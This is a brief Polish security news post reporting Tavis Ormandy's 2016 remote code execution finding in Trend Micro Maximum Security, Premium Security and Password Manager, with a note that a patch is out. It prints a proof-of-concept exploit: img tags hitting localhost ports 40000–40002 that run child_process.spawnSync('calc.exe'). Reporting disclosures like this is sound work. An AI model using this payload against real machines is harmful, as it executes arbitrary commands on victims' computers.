Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Trend Micro Maximum Security – można wykonywać kod w OS na komputerze ofiary… szybko patchujcie

31 marca 2016, 11:46 | W biegu | 1 komentarz

Tavis – rozwalacz antywirusów – Ormandy tym razem tak napisał o trzech produktach Trend Micro:

Frankly, the issue is already ridiculously easy to discover and exploit though.

Tym razem chodzi o wykonanie kodu na komputerze ofiary, poprzez…odwiedzenie takiego obrazka:

<img src="http://localhost:40000/json/new/?javascript:require('child_process').spawnSync('calc.exe')
<img src="http://localhost:40001/json/new/?javascript:require('child_process').spawnSync('calc.exe')
<img src="http://localhost:40002/json/new/?javascript:require('child_process').spawnSync('calc.exe')

Podatne produkty:

* Trend Micro Maximum Security
* Trend Micro Premium Security
* Trend Micro Password Manager

Aktualizacja została co dopiero udostępniona.

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. agares

    Wiem że może to i kopanie leżącego, ale z jakimi uprawnieniami się taki kod wykonuje? Czyżby SYSTEM? :)

    Odpowiedz

Odpowiedz